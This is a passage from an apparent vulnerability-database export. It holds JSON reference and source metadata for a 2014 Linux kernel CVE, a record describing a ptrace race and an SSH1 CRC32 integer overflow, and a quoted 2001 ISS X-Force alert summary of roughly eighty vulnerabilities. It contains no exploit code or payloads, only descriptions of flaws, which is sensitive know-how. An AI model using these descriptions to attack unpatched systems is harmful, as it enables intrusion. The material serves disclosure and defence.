        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3185"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3182"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-4656"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3186"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6410"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2013-2929"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-4654"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3631"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3631"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-5045"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3181"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3687"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3182"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-1971.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3186"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3185"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-4655"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3184"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3673"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-6410"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3687"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/site/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-3144.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3144"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-3153.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-0206.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3153"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3940"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-0913.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-3145.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-3940.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-0181.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-4027.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-3917.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-4667.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-4699.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/#package"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3145"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/3.13.0-35.62"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-2337-1"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71967"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003017"
      },
      {
        "db": "PACKETSTORM",
        "id": "128090"
      },
      {
        "db": "PACKETSTORM",
        "id": "127788"
      },
      {
        "db": "PACKETSTORM",
        "id": "128089"
      },
      {
        "db": "PACKETSTORM",
        "id": "127515"
      },
      {
        "db": "PACKETSTORM",
        "id": "129430"
      },
      {
        "db": "PACKETSTORM",
        "id": "127555"
      },
      {
        "db": "PACKETSTORM",
        "id": "128091"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-527"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-4027"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-71967"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003017"
      },
      {
        "db": "PACKETSTORM",
        "id": "128090"
      },
      {
        "db": "PACKETSTORM",
        "id": "127788"
      },
      {
        "db": "PACKETSTORM",
        "id": "128089"
      },
      {
        "db": "PACKETSTORM",
        "id": "127515"
      },
      {
        "db": "PACKETSTORM",
        "id": "129430"
      },
      {
        "db": "PACKETSTORM",
        "id": "127555"
      },
      {
        "db": "PACKETSTORM",
        "id": "128091"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-527"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-4027"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-06-23T00:00:00",
        "db": "VULHUB",
        "id": "VHN-71967"
      },
      {
        "date": "2014-06-24T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-003017"
      },
      {
        "date": "2014-09-02T20:21:38",
        "db": "PACKETSTORM",
        "id": "128090"
      },
      {
        "date": "2014-08-08T21:42:49",
        "db": "PACKETSTORM",
        "id": "127788"
      },
      {
        "date": "2014-09-02T20:21:27",
        "db": "PACKETSTORM",
        "id": "128089"
      },
      {
        "date": "2014-07-17T21:46:58",
        "db": "PACKETSTORM",
        "id": "127515"
      },
      {
        "date": "2014-12-09T23:13:52",
        "db": "PACKETSTORM",
        "id": "129430"
      },
      {
        "date": "2014-07-22T23:12:07",
        "db": "PACKETSTORM",
        "id": "127555"
      },
      {
        "date": "2014-09-02T20:21:47",
        "db": "PACKETSTORM",
        "id": "128091"
      },
      {
        "date": "2014-06-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201406-527"
      },
      {
        "date": "2014-06-23T11:21:18.700000",
        "db": "NVD",
        "id": "CVE-2014-4027"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-08-21T00:00:00",
        "db": "VULHUB",
        "id": "VHN-71967"
      },
      {
        "date": "2014-11-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-003017"
      },
      {
        "date": "2014-06-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201406-527"
      },
      {
        "date": "2023-11-07T02:20:22.100000",
        "db": "NVD",
        "id": "CVE-2014-4027"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "specific network environment",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-527"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel of  drivers/target/target_core_rd.c Inside  rd_build_device_space Vulnerabilities that capture important information in functions",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003017"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-527"
      }
    ],
    "trust": 0.6
  }
}

var-200105-0064
Vulnerability from variot

Race condition in ptrace in Linux kernel 2.4 and 2.2 allows local users to gain privileges by using ptrace to track and modify a running setuid process. Multiple Cisco networking products contain a denial-of-service vulnerability. There is an information integrity vulnerability in the SSH1 protocol that allows packets encrypted with a block cipher to be modified without notice. There is a remote integer overflow vulnerability in several implementations of the SSH1 protocol that allows an attacker to execute arbitrary code with the privileges of the SSH daemon, typically root. The program pgp4pine version 1.75.6 fails to properly identify expired keys when working with the Gnu Privacy Guard program (GnuPG). This failure may result in the clear-text transmission of senstive information when used with the PINE mail reading package. The SEDUM web server permits intruders to access files outside the web root. Secure Shell, or SSH, is an encrypted remote access protocol. SSH or code based on SSH is used by many systems all over the world and in a wide variety of commercial applications. An integer-overflow bug in the CRC32 compensation attack detection code may allow remote attackers to write values to arbitrary locations in memory. This would occur in situations where large SSH packets are recieved by either a client or server, and a 32 bit representation of the SSH packet length is assigned to a 16 bit integer. The difference in data representation in these situations will cause the 16 bit variable to be assigned to zero (or a really low value). As a result, future calls to malloc() as well as an index used to reference locations in memory can be corrupted by an attacker. This could occur in a manner that can be exploited to write certain numerical values to almost arbitrary locations in memory. UPDATE: There have been reports suggesting that exploitation of this vulnerability may be widespread. Since early september, independent, reliable sources have confirmed that this vulnerability is being exploited by attackers on the Internet. Security Focus does not currently have the exploit code being used, however this record will be updated if and when it becomes available. NOTE: Cisco 11000 Content Service Switch family is vulnerable to this issue. All WebNS releases prior, but excluding, versions: 4.01 B42s, 4.10 22s, 5.0 B11s, 5.01 B6s, are vulnerable. Secure Computing SafeWord Agent for SSH is reportedly prone to this issue, as it is based on a vulnerable version of SSH. ** NetScreen ScreenOS is not directly vulnerable to this issue, however the referenced exploit will cause devices using vulnerable versions of the software to stop functioning properly. This will result in a denial of service condition for NetScreen devices. This issue is in the Secure Command Shell (SCS) administrative interface, which is an implementation of SSHv1. SCS is not enabled on NetScreen devices by default. Cisco has reported that scanning for SSH vulnerabilities on affected devices will cause excessive CPU consumption. The condition is due to a failure of the Cisco SSH implementation to properly process large SSH packets. As many of these devices are critical infrastructure components, more serious network outages may occur. Cisco has released upgrades that will eliminate this vulnerability. An expired public key could cause GPG to fail the encryption of an outgoing message, without any error message or warning being delivered to the user. As a result, the user could transmit data, meant to be encrypted, as plaintext. TO UNSUBSCRIBE: email "unsubscribe alert" in the body of your message to majordomo@iss.net Contact alert-owner@iss.net for help with any problems!


-----BEGIN PGP SIGNED MESSAGE-----

ISS X-Force has received reports that some individuals were unable to verify the PGP signature on the Security Alert Summary distributed earlier in the week. Due to this issue, X-Force is re-distributing the Security Alert Summary. We apologize for any inconvience this may have caused.

Internet Security Systems Security Alert Summary March 5, 2001 Volume 6 Number 4

X-Force Vulnerability and Threat Database: http://xforce.iss.net/ To receive these Alert Summaries as well as other Alerts and Advisories, subscribe to the Internet Security Systems Alert mailing list at: http://xforce.iss.net/maillists/index.php

This summary can be found at http://xforce.iss.net/alerts/vol-6_num-4.php


Contents

90 Reported Vulnerabilities

Risk Factor Key


Date Reported: 2/27/01 Vulnerability: a1-server-dos Platforms Affected: A1 Server Risk Factor: Medium Attack Type: Network Based Brief Description: A1 Server denial of service X-Force URL: http://xforce.iss.net/static/6161.php


Date Reported: 2/27/01 Vulnerability: a1-server-directory-traversal Platforms Affected: A1 Server Risk Factor: Medium Attack Type: Network Based Brief Description: A1 Server directory traversal X-Force URL: http://xforce.iss.net/static/6162.php


Date Reported: 2/27/01 Vulnerability: webreflex-web-server-dos Platforms Affected: WebReflex Risk Factor: Medium Attack Type: Network Based Brief Description: WebReflex Web server denial of service X-Force URL: http://xforce.iss.net/static/6163.php


Date Reported: 2/26/01 Vulnerability: sudo-bo-elevate-privileges Platforms Affected: Sudo Risk Factor: Medium Attack Type: Host Based Brief Description: Sudo buffer overflow could allow elevated user privileges X-Force URL: http://xforce.iss.net/static/6153.php


Date Reported: 2/26/01 Vulnerability: mygetright-skin-overwrite-file Platforms Affected: My GetRight Risk Factor: High Attack Type: Network Based Brief Description: My GetRight 'skin' allows remote attacker to overwrite existing files X-Force URL: http://xforce.iss.net/static/6155.php


Date Reported: 2/26/01 Vulnerability: mygetright-directory-traversal Platforms Affected: My GetRight Risk Factor: Medium Attack Type: Network Based Brief Description: My GetRight directory traversal X-Force URL: http://xforce.iss.net/static/6156.php


Date Reported: 2/26/01 Vulnerability: win2k-event-viewer-bo Platforms Affected: Windows 2000 Risk Factor: once-only Attack Type: Host Based Brief Description: Windows 2000 event viewer buffer overflow X-Force URL: http://xforce.iss.net/static/6160.php


Date Reported: 2/26/01 Vulnerability: netscape-collabra-cpu-dos Platforms Affected: Netscape Risk Factor: Medium Attack Type: Network Based Brief Description: Netscape Collabra CPU denial of service X-Force URL: http://xforce.iss.net/static/6159.php


Date Reported: 2/26/01 Vulnerability: netscape-collabra-kernel-dos Platforms Affected: Netscape Risk Factor: Medium Attack Type: Network Based Brief Description: Netscape Collabra Server kernel denial of service X-Force URL: http://xforce.iss.net/static/6158.php


Date Reported: 2/23/01 Vulnerability: mercur-expn-bo Platforms Affected: MERCUR Risk Factor: High Attack Type: Network Based Brief Description: MERCUR Mailserver EXPN buffer overflow X-Force URL: http://xforce.iss.net/static/6149.php


Date Reported: 2/23/01 Vulnerability: sedum-http-dos Platforms Affected: SEDUM Risk Factor: Medium Attack Type: Network Based Brief Description: SEDUM HTTP server denial of service X-Force URL: http://xforce.iss.net/static/6152.php


Date Reported: 2/23/01 Vulnerability: tru64-inetd-dos Platforms Affected: Tru64 Risk Factor: Medium Attack Type: Host Based Brief Description: Tru64 UNIX inetd denial of service X-Force URL: http://xforce.iss.net/static/6157.php


Date Reported: 2/22/01 Vulnerability: outlook-vcard-bo Platforms Affected: Microsoft Outlook Risk Factor: High Attack Type: Host Based Brief Description: Outlook and Outlook Express vCards buffer overflow X-Force URL: http://xforce.iss.net/static/6145.php


Date Reported: 2/22/01 Vulnerability: ultimatebb-cookie-member-number Platforms Affected: Ultimate Bulletin Board Risk Factor: High Attack Type: Network Based Brief Description: Ultimate Bulletin Board cookie allows attacker to change member number X-Force URL: http://xforce.iss.net/static/6144.php


Date Reported: 2/21/01 Vulnerability: ultimatebb-cookie-gain-privileges Platforms Affected: Ultimate Bulletin Board Risk Factor: Medium Attack Type: Network Based Brief Description: Ultimate Bulletin Board allows remote attacker to obtain cookie information X-Force URL: http://xforce.iss.net/static/6142.php


Date Reported: 2/21/01 Vulnerability: sendmail-elevate-privileges Platforms Affected: Sendmail Risk Factor: High Attack Type: Host Based Brief Description: Sendmail -bt command could allow the elevation of privileges X-Force URL: http://xforce.iss.net/static/6147.php


Date Reported: 2/21/01 Vulnerability: jre-jdk-execute-commands Platforms Affected: JRE/JDK Risk Factor: High Attack Type: Host Based Brief Description: JRE/JDK could allow unauthorized execution of commands X-Force URL: http://xforce.iss.net/static/6143.php


Date Reported: 2/20/01 Vulnerability: licq-remote-port-dos Platforms Affected: LICQ Risk Factor: Medium Attack Type: Network Based Brief Description: LICQ remote denial of service X-Force URL: http://xforce.iss.net/static/6134.php


Date Reported: 2/20/01 Vulnerability: pgp4pine-expired-keys Platforms Affected: pgp4pine Risk Factor: Medium Attack Type: Host Based Brief Description: pgp4pine may transmit messages using expired public keys X-Force URL: http://xforce.iss.net/static/6135.php


Date Reported: 2/20/01 Vulnerability: chilisoft-asp-view-files Platforms Affected: Chili!Soft ASP Risk Factor: High Attack Type: Network Based Brief Description: Chili!Soft ASP allows remote attackers to gain access to sensitive information X-Force URL: http://xforce.iss.net/static/6137.php


Date Reported: 2/20/01 Vulnerability: win2k-domain-controller-dos Platforms Affected: Windows 2000 Risk Factor: once-only Attack Type: Network/Host Based Brief Description: Windows 2000 domain controller denial of service X-Force URL: http://xforce.iss.net/static/6136.php


Date Reported: 2/19/01 Vulnerability: asx-remote-dos Platforms Affected: ASX Switches Risk Factor: Medium Attack Type: Network Based Brief Description: ASX switches allow remote denial of service X-Force URL: http://xforce.iss.net/static/6133.php


Date Reported: 2/18/01 Vulnerability: http-cgi-mailnews-username Platforms Affected: Mailnews.cgi Risk Factor: High Attack Type: Network Based Brief Description: Mailnews.cgi allows remote attacker to execute shell commands using username X-Force URL: http://xforce.iss.net/static/6139.php


Date Reported: 2/17/01 Vulnerability: badblue-ext-reveal-path Platforms Affected: BadBlue Risk Factor: Low Attack Type: Network Based Brief Description: BadBlue ext.dll library reveals path X-Force URL: http://xforce.iss.net/static/6130.php


Date Reported: 2/17/01 Vulnerability: badblue-ext-dos Platforms Affected: BadBlue Risk Factor: Medium Attack Type: Network Based Brief Description: BadBlue ext.dll library denial of service X-Force URL: http://xforce.iss.net/static/6131.php


Date Reported: 2/17/01 Vulnerability: moby-netsuite-bo Platforms Affected: Moby's NetSuite Risk Factor: Medium Attack Type: Network Based Brief Description: Moby's NetSuite Web server buffer overflow X-Force URL: http://xforce.iss.net/static/6132.php


Date Reported: 2/16/01 Vulnerability: webactive-directory-traversal Platforms Affected: WEBactive Risk Factor: Medium Attack Type: Network/Host Based Brief Description: WEBactive HTTP Server directory traversal X-Force URL: http://xforce.iss.net/static/6121.php


Date Reported: 2/16/01 Vulnerability: esone-cgi-directory-traversal Platforms Affected: ES.One store.cgi Risk Factor: Medium Attack Type: Network Based Brief Description: Thinking Arts ES.One store.cgi directory traversal X-Force URL: http://xforce.iss.net/static/6124.php


Date Reported: 2/16/01 Vulnerability: vshell-username-bo Platforms Affected: VShell Risk Factor: High Attack Type: Network Based Brief Description: VShell username buffer overflow X-Force URL: http://xforce.iss.net/static/6146.php


Date Reported: 2/16/01 Vulnerability: vshell-port-forwarding-rule Platforms Affected: VShell Risk Factor: Medium Attack Type: Network/Host Based Brief Description: VShell uses weak port forwarding rule X-Force URL: http://xforce.iss.net/static/6148.php


Date Reported: 2/15/01 Vulnerability: pi3web-isapi-bo Platforms Affected: Pi3Web Risk Factor: Medium Attack Type: Network/Host Based Brief Description: Pi3Web ISAPI tstisapi.dll denial of service X-Force URL: http://xforce.iss.net/static/6113.php


Date Reported: 2/15/01 Vulnerability: pi3web-reveal-path Platforms Affected: Pi3Web Risk Factor: Low Attack Type: Network Based Brief Description: Pi3Web reveals physical path of server X-Force URL: http://xforce.iss.net/static/6114.php


Date Reported: 2/15/01 Vulnerability: bajie-execute-shell Platforms Affected: Bajie HTTP JServer Risk Factor: High Attack Type: Network Based Brief Description: Bajie HTTP JServer execute shell commands X-Force URL: http://xforce.iss.net/static/6117.php


Date Reported: 2/15/01 Vulnerability: bajie-directory-traversal Platforms Affected: Bajie HTTP JServer Risk Factor: High Attack Type: Network Based Brief Description: Bajie HTTP JServer directory traversal X-Force URL: http://xforce.iss.net/static/6115.php


Date Reported: 2/15/01 Vulnerability: resin-directory-traversal Platforms Affected: Resin Risk Factor: Medium Attack Type: Network Based Brief Description: Resin Web server directory traversal X-Force URL: http://xforce.iss.net/static/6118.php


Date Reported: 2/15/01 Vulnerability: netware-mitm-recover-passwords Platforms Affected: Netware Risk Factor: Low Attack Type: Network Based Brief Description: Netware "man in the middle" attack password recovery X-Force URL: http://xforce.iss.net/static/6116.php


Date Reported: 2/14/01 Vulnerability: firebox-pptp-dos Platforms Affected: WatchGuard Firebox II Risk Factor: High Attack Type: Network Based Brief Description: WatchGuard Firebox II PPTP denial of service X-Force URL: http://xforce.iss.net/static/6109.php


Date Reported: 2/14/01 Vulnerability: hp-virtualvault-iws-dos Platforms Affected: HP VirtualVault Risk Factor: Medium Attack Type: Network/Host Based Brief Description: HP VirtualVault iPlanet Web Server denial of service X-Force URL: http://xforce.iss.net/static/6110.php


Date Reported: 2/14/01 Vulnerability: kicq-execute-commands Platforms Affected: KICQ Risk Factor: High Attack Type: Network Based Brief Description: kicq could allow remote execution of commands X-Force URL: http://xforce.iss.net/static/6112.php


Date Reported: 2/14/01 Vulnerability: hp-text-editor-bo Platforms Affected: HPUX Risk Factor: Medium Attack Type: Host Based Brief Description: HP Text editors buffer overflow X-Force URL: http://xforce.iss.net/static/6111.php


Date Reported: 2/13/01 Vulnerability: sendtemp-pl-read-files Platforms Affected: sendtemp.pl Risk Factor: Medium Attack Type: Network/Host Based Brief Description: sendtemp.pl could allow an attacker to read files on the server X-Force URL: http://xforce.iss.net/static/6104.php


Date Reported: 2/13/01 Vulnerability: analog-alias-bo Platforms Affected: Analog ALIAS Risk Factor: Medium Attack Type: Network/Host Based Brief Description: Analog ALIAS command buffer overflow X-Force URL: http://xforce.iss.net/static/6105.php


Date Reported: 2/13/01 Vulnerability: elm-long-string-bo Platforms Affected: Elm Risk Factor: Medium Attack Type: Host Based Brief Description: ELM -f command long string buffer overflow X-Force URL: http://xforce.iss.net/static/6151.php


Date Reported: 2/13/01 Vulnerability: winnt-pptp-dos Platforms Affected: Windows NT Risk Factor: Medium Attack Type: Network Based Brief Description: Windows NT PPTP denial of service X-Force URL: http://xforce.iss.net/static/6103.php


Date Reported: 2/12/01 Vulnerability: startinnfeed-format-string Platforms Affected: Inn Risk Factor: High Attack Type: Host Based Brief Description: Inn 'startinnfeed' binary format string attack X-Force URL: http://xforce.iss.net/static/6099.php


Date Reported: 2/12/01 Vulnerability: his-auktion-cgi-url Platforms Affected: HIS Auktion Risk Factor: Medium Attack Type: Network/Host Based Brief Description: HIS Auktion CGI script could allow attackers to view unauthorized files or execute commands X-Force URL: http://xforce.iss.net/static/6090.php


Date Reported: 2/12/01 Vulnerability: wayboard-cgi-view-files Platforms Affected: Way-BOARD Risk Factor: Medium Attack Type: Network Based Brief Description: Way-BOARD CGI could allow attackers to view unauthorized files X-Force URL: http://xforce.iss.net/static/6091.php


Date Reported: 2/12/01 Vulnerability: muskat-empower-url-dir Platforms Affected: Musket Empower Risk Factor: Low Attack Type: Network/Host Based Brief Description: Musket Empower could allow attackers to gain access to the DB directory path X-Force URL: http://xforce.iss.net/static/6093.php


Date Reported: 2/12/01 Vulnerability: icq-icu-rtf-dos Platforms Affected: LICQ Gnome ICU Risk Factor: Low Attack Type: Network/Host Based Brief Description: LICQ and Gnome ICU rtf file denial of service X-Force URL: http://xforce.iss.net/static/6096.php


Date Reported: 2/12/01 Vulnerability: commerce-cgi-view-files Platforms Affected: Commerce.cgi Risk Factor: Medium Attack Type: Network Based Brief Description: Commerce.cgi could allow attackers to view unauthorized files X-Force URL: http://xforce.iss.net/static/6095.php


Date Reported: 2/12/01 Vulnerability: roads-search-view-files Platforms Affected: ROADS Risk Factor: Medium Attack Type: Network Based Brief Description: ROADS could allow attackers to view unauthorized files using search.pl program X-Force URL: http://xforce.iss.net/static/6097.php


Date Reported: 2/12/01 Vulnerability: webpage-cgi-view-info Platforms Affected: WebPage.cgi Risk Factor: Low Attack Type: Network Based Brief Description: WebPage.cgi allows attackers to view sensitive information X-Force URL: http://xforce.iss.net/static/6100.php


Date Reported: 2/12/01 Vulnerability: webspirs-cgi-view-files Platforms Affected: WebSPIRS Risk Factor: Medium Attack Type: Network Based Brief Description: WebSPIRS CGI could allow an attacker to view unauthorized files X-Force URL: http://xforce.iss.net/static/6101.php


Date Reported: 2/12/01 Vulnerability: webpals-library-cgi-url Platforms Affected: WebPALS Risk Factor: Medium Attack Type: Network Based Brief Description: WebPALS Library System CGI script could allow attackers to view unauthorized files or execute commands X-Force URL: http://xforce.iss.net/static/6102.php


Date Reported: 2/11/01 Vulnerability: cobol-apptrack-nolicense-permissions Platforms Affected: MicroFocus Cobol Risk Factor: High Attack Type: Host Based Brief Description: MicroFocus Cobol with AppTrack enabled with nolicense permissions X-Force URL: http://xforce.iss.net/static/6092.php


Date Reported: 2/11/01 Vulnerability: cobol-apptrack-nolicense-symlink Platforms Affected: MicroFocus Cobol Risk Factor: High Attack Type: Host Based Brief Description: MicroFocus Cobol with AppTrack enabled allows symlink in nolicense X-Force URL: http://xforce.iss.net/static/6094.php


Date Reported: 2/10/01 Vulnerability: vixie-crontab-bo Platforms Affected: Vixie crontab Risk Factor: Medium Attack Type: Host Based Brief Description: Vixie crontab buffer overflow X-Force URL: http://xforce.iss.net/static/6098.php


Date Reported: 2/10/01 Vulnerability: novell-groupwise-bypass-policies Platforms Affected: Novell GroupWise Risk Factor: Medium Attack Type: Network/Host Based Brief Description: Novell Groupwise allows user to bypass policies and view files X-Force URL: http://xforce.iss.net/static/6089.php


Date Reported: 2/9/01 Vulnerability: infobot-calc-gain-access Platforms Affected: Infobot Risk Factor: High Attack Type: Network Based Brief Description: Infobot 'calc' command allows remote users to gain access X-Force URL: http://xforce.iss.net/static/6078.php


Date Reported: 2/8/01 Vulnerability: linux-sysctl-read-memory Platforms Affected: Linux Risk Factor: Medium Attack Type: Host Based Brief Description: Linux kernel sysctl() read memory X-Force URL: http://xforce.iss.net/static/6079.php


Date Reported: 2/8/01 Vulnerability: openssh-bypass-authentication Platforms Affected: OpenSSH Risk Factor: High Attack Type: Network/Host Based Brief Description: OpenSSH 2.3.1 allows remote users to bypass authentication X-Force URL: http://xforce.iss.net/static/6084.php


Date Reported: 2/8/01 Vulnerability: lotus-notes-stored-forms Platforms Affected: Lotus Notes Risk Factor: High Attack Type: Network/Host Based Brief Description: Lotus Notes stored forms X-Force URL: http://xforce.iss.net/static/6087.php


Date Reported: 2/8/01 Vulnerability: linux-ptrace-modify-process Platforms Affected: Linux Risk Factor: High Attack Type: Host Based Brief Description: Linux kernel ptrace modify process X-Force URL: http://xforce.iss.net/static/6080.php


Date Reported: 2/8/01 Vulnerability: ssh-deattack-overwrite-memory Platforms Affected: SSH Risk Factor: High Attack Type: Network/Host Based Brief Description: SSH protocol 1.5 deattack.c allows memory to be overwritten X-Force URL: http://xforce.iss.net/static/6083.php


Date Reported: 2/7/01 Vulnerability: dc20ctrl-port-bo Platforms Affected: FreeBSD Risk Factor: Medium Attack Type: Host Based Brief Description: FreeBSD dc20ctrl port buffer overflow X-Force URL: http://xforce.iss.net/static/6077.php


Date Reported: 2/7/01 Vulnerability: ja-xklock-bo Platforms Affected: FreeBSD Risk Factor: High Attack Type: Host Based Brief Description: ja-xklock buffer overflow X-Force URL: http://xforce.iss.net/static/6073.php


Date Reported: 2/7/01 Vulnerability: ja-elvis-elvrec-bo Platforms Affected: FreeBSD Risk Factor: High Attack Type: Host Based Brief Description: FreeBSD ja-elvis port buffer overflow X-Force URL: http://xforce.iss.net/static/6074.php


Date Reported: 2/7/01 Vulnerability: ko-helvis-elvrec-bo Platforms Affected: FreeBSD Risk Factor: High Attack Type: Host Based Brief Description: FreeBSD ko-helvis port buffer overflow X-Force URL: http://xforce.iss.net/static/6075.php


Date Reported: 2/7/01 Vulnerability: serverworx-directory-traversal Platforms Affected: ServerWorx Risk Factor: Medium Attack Type: Network Based Brief Description: ServerWorx directory traversal X-Force URL: http://xforce.iss.net/static/6081.php


Date Reported: 2/7/01 Vulnerability: ntlm-ssp-elevate-privileges Platforms Affected: NTLM Risk Factor: High Attack Type: Host Based Brief Description: NTLM Security Support Provider could allow elevation of privileges X-Force URL: http://xforce.iss.net/static/6076.php


Date Reported: 2/7/01 Vulnerability: ssh-session-key-recovery Platforms Affected: SSH Risk Factor: High Attack Type: Network/Host Based Brief Description: SSH protocol 1.5 session key recovery X-Force URL: http://xforce.iss.net/static/6082.php


Date Reported: 2/6/01 Vulnerability: aolserver-directory-traversal Platforms Affected: AOLserver Risk Factor: Medium Attack Type: Network Based Brief Description: AOLserver directory traversal X-Force URL: http://xforce.iss.net/static/6069.php


Date Reported: 2/6/01 Vulnerability: chilisoft-asp-elevate-privileges Platforms Affected: Chili!Soft Risk Factor: High Attack Type: Network/Host Based Brief Description: Chili!Soft ASP could allow elevated privileges X-Force URL: http://xforce.iss.net/static/6072.php


Date Reported: 2/6/01 Vulnerability: win-udp-dos Platforms Affected: Windows Risk Factor: Medium Attack Type: Network/Host Based Brief Description: Windows UDP socket denial of service X-Force URL: http://xforce.iss.net/static/6070.php


Date Reported: 2/5/01 Vulnerability: ssh-daemon-failed-login Platforms Affected: SSH Risk Factor: High Attack Type: Network/Host Based Brief Description: SSH daemon failed login attempts are not logged X-Force URL: http://xforce.iss.net/static/6071.php


Date Reported: 2/5/01 Vulnerability: picserver-directory-traversal Platforms Affected: PicServer Risk Factor: Medium Attack Type: Network Based Brief Description: PicServer directory traversal X-Force URL: http://xforce.iss.net/static/6065.php


Date Reported: 2/5/01 Vulnerability: biblioweb-directory-traversal Platforms Affected: BiblioWeb Risk Factor: Medium Attack Type: Network Based Brief Description: BiblioWeb Server directory traversal X-Force URL: http://xforce.iss.net/static/6066.php


Date Reported: 2/5/01 Vulnerability: biblioweb-get-dos Platforms Affected: BiblioWeb Risk Factor: Low Attack Type: Network Based Brief Description: BiblioWeb Server GET request denial of service X-Force URL: http://xforce.iss.net/static/6068.php


Date Reported: 2/5/01 Vulnerability: ibm-netcommerce-reveal-information Platforms Affected: IBM Risk Factor: Medium Attack Type: Network/Host Based Brief Description: IBM Net.Commerce could reveal sensitive information X-Force URL: http://xforce.iss.net/static/6067.php


Date Reported: 2/5/01 Vulnerability: win-dde-elevate-privileges Platforms Affected: Windows DDE Risk Factor: High Attack Type: Host Based Brief Description: Windows DDE can allow the elevation of privileges X-Force URL: http://xforce.iss.net/static/6062.php


